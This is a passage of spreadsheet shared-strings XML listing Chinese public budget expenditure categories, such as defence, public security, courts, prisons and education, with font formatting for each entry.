      <t>其他支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国际发展合作</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他国际发展合作支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他外交支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他外交支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国防支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>军费</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>现役部队</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>预备役部队</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他军费支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国防科研事业</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国防科研事业</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>专项工程</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>专项工程</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国防动员</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>兵役征集</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>经济动员</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>人民防空</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>交通战备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>民兵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>边海防</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他国防动员支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他国防支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他国防支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公共安全支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>武装警察部队</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>武装警察部队</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他武装警察部队支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公安</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>执法办案</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>特别业务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>特勤业务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>移民事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他公安支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国家安全</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>安全业务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他国家安全支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>检察</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      “</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>两房</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>检察监督</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他检察支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>法院</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>案件审判</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>案件执行</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      “</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>两庭</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他法院支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>司法</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>基层司法业务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>普法宣传</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>律师管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>公共法律服务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国家统一法律职业资格考试</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>社区矫正</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>法治建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他司法支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>监狱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>罪犯生活及医疗卫生</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>监狱业务及罪犯改造</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>狱政设施建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他监狱支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>强制隔离戒毒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>强制隔离戒毒人员生活</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>强制隔离戒毒人员教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>所政设施建设</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他强制隔离戒毒支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国家保密</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>保密技术</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>保密管理</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他国家保密支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>缉私警察</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>缉私业务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他缉私警察支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他公共安全支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>国家司法救助支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他公共安全支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>教育支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>教育管理事务</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他教育管理事务支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>普通教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>学前教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>小学教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>初中教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>高中教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>高等教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>其他普通教育支出</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>职业教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>初等职业教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>中等职业教育</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>技校教育</t>
    </r>
  </si>
